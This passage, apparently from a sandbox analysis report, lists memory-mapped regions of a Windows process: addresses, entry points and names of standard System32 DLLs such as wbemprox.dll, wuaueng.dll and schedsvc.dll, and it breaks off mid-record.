"wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 3169 start_va = 0x7ffb116a0000 end_va = 0x7ffb116bdfff monitored = 0 entry_point = 0x7ffb116a3a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 3170 start_va = 0x7ffb116c0000 end_va = 0x7ffb11741fff monitored = 0 entry_point = 0x7ffb116c2a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 3171 start_va = 0x7ffb12610000 end_va = 0x7ffb12651fff monitored = 0 entry_point = 0x7ffb12613670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 3172 start_va = 0x7ffb12660000 end_va = 0x7ffb126a5fff monitored = 0 entry_point = 0x7ffb126679a0 region_type = mapped_file name = "adsldp.dll" filename = "\\Windows\\System32\\adsldp.dll" (normalized: "c:\\windows\\system32\\adsldp.dll") Region: id = 3173 start_va = 0x7ffb126b0000 end_va = 0x7ffb126effff monitored = 0 entry_point = 0x7ffb126bcbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 3174 start_va = 0x7ffb126f0000 end_va = 0x7ffb12736fff monitored = 0 entry_point = 0x7ffb126f1d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 3175 start_va = 0x7ffb12740000 end_va = 0x7ffb1275efff monitored = 0 entry_point = 0x7ffb127437e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 3176 start_va = 0x7ffb12760000 end_va = 0x7ffb127d8fff monitored = 0 entry_point = 0x7ffb127676a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 3177 start_va = 0x7ffb127f0000 end_va = 0x7ffb12807fff monitored = 0 entry_point = 0x7ffb127f4e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 3178 start_va = 0x7ffb12810000 end_va = 0x7ffb12834fff monitored = 0 entry_point = 0x7ffb12815ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 3179 start_va = 0x7ffb12850000 end_va = 0x7ffb12890fff monitored = 0 entry_point = 0x7ffb12853750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 3180 start_va = 0x7ffb128a0000 end_va = 0x7ffb12992fff monitored = 0 entry_point = 0x7ffb128c5d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 3181 start_va = 0x7ffb12a60000 end_va = 0x7ffb12a77fff monitored = 0 entry_point = 0x7ffb12a62000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 3182 start_va = 0x7ffb12a80000 end_va = 0x7ffb12c01fff monitored = 0 entry_point = 0x7ffb12a982a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 3183 start_va = 0x7ffb12c10000 end_va = 0x7ffb12cb2fff monitored = 0 entry_point = 0x7ffb12c12c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 3184 start_va = 0x7ffb12cc0000 end_va = 0x7ffb12d11fff monitored = 0 entry_point = 0x7ffb12cc5770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 3185 start_va = 0x7ffb12d40000 end_va = 0x7ffb12d6dfff monitored = 1 entry_point = 0x7ffb12d42300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 3186 start_va = 0x7ffb12d70000 end_va = 0x7ffb12dcdfff monitored = 0 entry_point = 0x7ffb12d75080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 3187 start_va = 0x7ffb12dd0000 end_va = 0x7ffb12deffff monitored = 0 entry_point = 0x7ffb12dd1f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 3188 start_va = 0x7ffb12df0000 end_va = 0x7ffb12df8fff monitored = 0 entry_point = 0x7ffb12df18f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 3189 start_va = 0x7ffb12e00000 end_va = 0x7ffb12e10fff monitored = 0 entry_point = 0x7ffb12e01d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 3190 start_va = 0x7ffb12f30000 end_va = 0x7ffb12faefff monitored = 0 entry_point = 0x7ffb12f47110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 3191 start_va = 0x7ffb12fb0000 end_va = 0x7ffb12febfff monitored = 0 entry_point = 0x7ffb12fb6aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 3192 start_va = 0x7ffb13040000 end_va = 0x7ffb1308bfff monitored = 0 entry_point = 0x7ffb13055310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 3193 start_va = 0x7ffb13090000 end_va = 0x7ffb1309bfff monitored = 0 entry_point = 0x7ffb130935c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 3194 start_va = 0x7ffb14500000 end_va = 0x7ffb14534fff monitored = 0 entry_point = 0x7ffb1450a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 3195 start_va = 0x7ffb16be0000 end_va = 0x7ffb16beffff monitored = 0 entry_point = 0x7ffb16be1690 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 3196 start_va = 0x7ffb16bf0000 end_va = 0x7ffb16e69fff monitored = 0 entry_point = 0x7ffb16c0a7a0 region_type = mapped_file name = "msxml6.dll" filename = "\\Windows\\System32\\msxml6.dll" (normalized: "c:\\windows\\system32\\msxml6.dll") Region: id = 3197 start_va = 0x7ffb18160000 end_va = 0x7ffb18172fff monitored = 0 entry_point = 0x7ffb18161b10 region_type = mapped_file name = "devrtl.dll" filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll") Region: id = 3198 start_va = 0x7ffb18180000 end_va = 0x7ffb18201fff monitored = 0 entry_point = 0x7ffb18181790 region_type = mapped_file name = "newdev.dll" filename = "\\Windows\\System32\\newdev.dll" (normalized: "c:\\windows\\system32\\newdev.dll") Region: id = 3199 start_va = 0x7ffb18210000 end_va = 0x7ffb18293fff monitored = 0 entry_point = 0x7ffb18222830 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 3200 start_va = 0x7ffb182a0000 end_va = 0x7ffb18304fff monitored = 0 entry_point = 0x7ffb182b3170 region_type = mapped_file name = "wuuhext.dll" filename = "\\Windows\\System32\\wuuhext.dll" (normalized: "c:\\windows\\system32\\wuuhext.dll") Region: id = 3201 start_va = 0x7ffb18310000 end_va = 0x7ffb18608fff monitored = 0 entry_point = 0x7ffb183d7280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 3202 start_va = 0x7ffb18610000 end_va = 0x7ffb18845fff monitored = 0 entry_point = 0x7ffb1869a450 region_type = mapped_file name = "wuaueng.dll" filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll") Region: id = 3203 start_va = 0x7ffb19500000 end_va = 0x7ffb19521fff monitored = 0 entry_point = 0x7ffb19512540 region_type = mapped_file name = "updatepolicy.dll" filename = "\\Windows\\System32\\updatepolicy.dll" (normalized: "c:\\windows\\system32\\updatepolicy.dll") Region: id = 3204 start_va = 0x7ffb19530000 end_va = 0x7ffb19604fff monitored = 0 entry_point = 0x7ffb1954cf80 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" (normalized: "c:\\windows\\system32\\wuapi.dll") Region: id = 3205 start_va = 0x7ffb196d0000 end_va = 0x7ffb1970ffff monitored = 0 entry_point = 0x7ffb196e6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 3206 start_va = 0x7ffb19750000 end_va = 0x7ffb19a89fff monitored = 0 entry_point = 0x7ffb19758520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 3207 start_va = 0x7ffb1a000000 end_va = 0x7ffb1a009fff monitored = 0 entry_point = 0x7ffb1a001350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 3208 start_va = 0x7ffb1a350000 end_va = 0x7ffb1a358fff monitored = 0 entry_point = 0x7ffb1a3521d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 3209 start_va = 0x7ffb1a510000 end_va = 0x7ffb1a521fff monitored = 0 entry_point = 0x7ffb1a513580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 3210 start_va = 0x7ffb1a590000 end_va = 0x7ffb1a5a3fff monitored = 0 entry_point = 0x7ffb1a593710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 3211 start_va = 0x7ffb1a5b0000 end_va = 0x7ffb1a5d7fff monitored = 0 entry_point = 0x7ffb1a5befc0 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 3212 start_va = 0x7ffb1a640000 end_va = 0x7ffb1a65dfff monitored = 0 entry_point = 0x7ffb1a64ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 3213 start_va = 0x7ffb1a9b0000 end_va = 0x7ffb1aa2ffff monitored = 0 entry_point = 0x7ffb1a9dd280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 3214 start_va = 0x7ffb1aa70000 end_va = 0x7ffb1aa85fff monitored = 0 entry_point = 0x7ffb1aa71d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 3215 start_va = 0x7ffb1c710000 end_va = 0x7ffb1c719fff monitored = 0 entry_point = 0x7ffb1c7114c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 3216 start_va = 0x7ffb1cb20000 end_va = 0x7ffb1cb34fff monitored = 0 entry_point = 0x7ffb1cb22dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 3217 start_va = 0x7ffb1d1d0000 end_va = 0x7ffb1d1dffff monitored = 0 entry_point = 0x7ffb1d1d1700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 3218 start_va = 0x7ffb1d1e0000 end_va = 0x7ffb1d1e8fff monitored = 0 entry_point = 0x7ffb1d1e1ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 3219 start_va = 0x7ffb1d1f0000 end_va = 0x7ffb1d21cfff monitored = 0 entry_point = 0x7ffb1d1f2290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 3220 start_va = 0x7ffb1d220000 end_va = 0x7ffb1d271fff monitored = 0 entry_point = 0x7ffb1d2238e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 3221 start_va = 0x7ffb1d3f0000 end_va = 0x7ffb1d40afff monitored = 0 entry_point = 0x7ffb1d3f1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 3222 start_va = 0x7ffb1d700000 end_va = 0x7ffb1d70dfff monitored = 0 entry_point = 0x7ffb1d701460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 3223 start_va = 0x7ffb1d870000 end_va = 0x7ffb1d88efff monitored = 0 entry_point = 0x7ffb1d874960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 3224 start_va = 0x7ffb1d8c0000 end_va = 0x7ffb1d959fff monitored = 0 entry_point = 0x7ffb1d8dada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 3225 start_va = 0x7ffb1d960000 end_va = 0x7ffb1d974fff monitored = 0 entry_point = 0x7ffb1d963460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 3226 start_va = 0x7ffb1da70000 end_va = 0x7ffb1dab0fff monitored = 0 entry_point = 0x7ffb1da74840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 3227 start_va = 0x7ffb1dac0000 end_va = 0x7ffb1db26fff monitored = 0 entry_point = 0x7ffb1dac63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 3228 start_va = 0x7ffb1dc60000 end_va = 0x7ffb1dd1ffff monitored = 0 entry_point = 0x7ffb1dc8fd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 3229 start_va = 0x7ffb1dd20000 end_va = 0x7ffb1dd39fff monitored = 0 entry_point = 0x7ffb1dd22430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 3230 start_va = 0x7ffb1dd40000 end_va = 0x7ffb1dd55fff monitored = 0 entry_point = 0x7ffb1dd419f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 3231 start_va = 0x7ffb1dd60000 end_va = 0x7ffb1dd97fff monitored = 0 entry_point = 0x7ffb1dd78cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 3232 start_va = 0x7ffb1dda0000 end_va = 0x7ffb1ddaafff monitored = 0 entry_point = 0x7ffb1dda1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 3233 start_va = 0x7ffb1ddb0000 end_va = 0x7ffb1de95fff monitored = 0 entry_point = 0x7ffb1ddccf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 3234 start_va = 0x7ffb1dfc0000 end_va = 0x7ffb1dfcafff monitored = 0 entry_point = 0x7ffb1dfc1de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 3235 start_va = 0x7ffb1dff0000 end_va = 0x7ffb1e01dfff monitored = 0 entry_point = 0x7ffb1dff7550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 3236 start_va = 0x7ffb1e020000 end_va = 0x7ffb1e02cfff monitored = 0 entry_point = 0x7ffb1e022ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 3237 start_va = 0x7ffb1e030000 end_va = 0x7ffb1e05efff monitored = 0 entry_point = 0x7ffb1e038910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 3238 start_va = 0x7ffb1e070000 end_va = 0x7ffb1e085fff monitored = 0 entry_point = 0x7ffb1e071b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 3239 start_va = 0x7ffb1e130000 end_va = 0x7ffb1e13ffff monitored = 0 entry_point = 0x7ffb1e132c60 region_type = mapped_file name = "usermgrcli.dll" filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll") Region: id = 3240 start_va = 0x7ffb1e140000 end_va = 0x7ffb1e153fff monitored = 0 entry_point = 0x7ffb1e142d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 3241 start_va = 0x7ffb1e2c0000 end_va = 0x7ffb1e2d1fff monitored = 0 entry_point = 0x7ffb1e2c1a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 3242 start_va = 0x7ffb1e440000 end_va = 0x7ffb1e4d2fff monitored = 0 entry_point = 0x7ffb1e449680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 3243 start_va = 0x7ffb1e5f0000 end_va = 0x7ffb1e608fff monitored = 0 entry_point = 0x7ffb1e5f4520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 3244 start_va = 0x7ffb1e820000 end_va = 0x7ffb1e88dfff monitored = 0 entry_point = 0x7ffb1e827f60 region_type = mapped_file name = "taskcomp.dll" filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll") Region: id = 3245 start_va = 0x7ffb1e890000 end_va = 0x7ffb1e8a0fff monitored = 0 entry_point = 0x7ffb1e893320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 3246 start_va = 0x7ffb1e8b0000 end_va = 0x7ffb1e8f0fff monitored = 0 entry_point = 0x7ffb1e8c7eb0 region_type = mapped_file name = "ubpm.dll" filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll") Region: id = 3247 start_va = 0x7ffb1e900000 end_va = 0x7ffb1e9fbfff monitored = 0 entry_point = 0x7ffb1e936df0 region_type = mapped_file name = "schedsvc.dll" filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll") Region: id = 3248 start_va = 0x7ffb1ea00000 end_va = 0x7ffb1eaadfff monitored = 0 entry_point = 0x7ffb1ea180c0 region_type = mapped_file name = "windows.networking.connectivity.dll" filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll") Region: id = 3249 start_va = 0x7ffb1eab0000 end_va = 0x7ffb1eac1fff monitored = 0 entry_point = 0x7ffb1eab9260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 3250 start_va = 0x7ffb1ead0000 end_va = 0x7ffb1eb80fff monitored = 0 entry_point = 0x7ffb1eb488b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 3251 start_va = 0x7ffb1eb90000 end_va = 0x7ffb1ebb4fff monitored = 0 entry_point = 0x7ffb1eba2f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 3252 start_va = 0x7ffb1ebc0000 end_va = 0x7ffb1ebd0fff monitored = 0 entry_point = 0x7ffb1ebc7ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 3253 start_va = 0x7ffb1ebe0000 end_va = 0x7ffb1ebf9fff monitored = 0 entry_point = 0x7ffb1ebe2cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 3254 start_va = 0x7ffb1ec00000 end_va = 0x7ffb1ec0bfff monitored = 0 entry_point = 0x7ffb1ec014d0 region_type = mapped_file name = "locationframeworkps.dll" filename = "\\Windows\\System32\\LocationFrameworkPS.dll" (normalized: "c:\\windows\\system32\\locationframeworkps.dll") Region: id = 3255 start_va = 0x7ffb1ec10000 end_va = 0x7ffb1ec64fff monitored = 0 entry_point = 0x7ffb1ec13fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 3256 start_va = 0x7ffb1ec70000 end_va = 0x7ffb1eca6fff monitored = 0 entry_point = 0x7ffb1ec76020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 3257 start_va = 0x7ffb1ecb0000 end_va = 0x7ffb1eccffff monitored = 0 entry_point = 0x7ffb1ecb39a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 3258 start_va = 0x7ffb1f310000 end_va = 0x7ffb1f691fff monitored = 0 entry_point = 0x7ffb1f361220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 3259 start_va = 0x7ffb1f6a0000 end_va = 0x7ffb1f7d5fff monitored = 0 entry_point = 0x7ffb1f6cf350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 3260 start_va = 0x7ffb208d0000 end_va = 0x7ffb209ddfff monitored = 0 entry_point = 0x7ffb2091eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 3261 start_va = 0x7ffb20f80000 end_va = 0x7ffb2103efff monitored = 0 entry_point = 0x7ffb20fa1c50 region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 3262 start_va = 0x7ffb21040000 end_va = 0x7ffb21107fff monitored = 0 entry_point = 0x7ffb210813f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3263 start_va = 0x7ffb21110000 end_va = 0x7ffb21170fff monitored = 0 entry_point = 0x7ffb21114b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 3264 start_va = 0x7ffb21180000 end_va = 0x7ffb212fbfff monitored = 0 entry_point = 0x7ffb211d1650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 3265 start_va = 0x7ffb21300000 end_va = 0x7ffb2130afff monitored = 0 entry_point = 0x7ffb21301770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 3266 start_va = 0x7ffb21310000 end_va = 0x7ffb21326fff monitored = 0 entry_point = 0x7ffb21315630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 3267 start_va = 0x7ffb21330000 end_va = 0x7ffb2136dfff monitored = 0 entry_point = 0x7ffb2133a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 3268 start_va = 0x7ffb21370000 end_va = 0x7ffb21396fff monitored = 0 entry_point = 0x7ffb21373bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 3269 start_va = 0x7ffb213a0000 end_va = 0x7ffb213f4fff monitored = 0 entry_point = 0x7ffb213afc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 3270 start_va = 0x7ffb21400000 end_va = 0x7ffb21412fff monitored = 0 entry_point = 0x7ffb214057f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 3271 start_va = 0x7ffb21420000 end_va = 0x7ffb2142bfff monitored = 0 entry_point = 0x7ffb21422830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 3272 start_va = 0x7ffb21430000 end_va = 0x7ffb21439fff monitored = 0 entry_point = 0x7ffb21431660 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 3273 start_va = 0x7ffb21440000 end_va = 0x7ffb21457fff monitored = 0 entry_point = 0x7ffb21445910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 3274 start_va = 0x7ffb21460000 end_va = 0x7ffb215acfff monitored = 0 entry_point = 0x7ffb214a3da0 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 3275 start_va = 0x7ffb21640000 end_va = 0x7ffb216d1fff monitored = 0 entry_point = 0x7ffb2168a780 region_type = mapped_file name = "msvcp110_win.dll" filename = "\\Windows\\System32\\msvcp110_win.dll" (normalized: "c:\\windows\\system32\\msvcp110_win.dll") Region: id = 3276 start_va = 0x7ffb21760000 end_va = 0x7ffb217d9fff monitored = 0 entry_point = 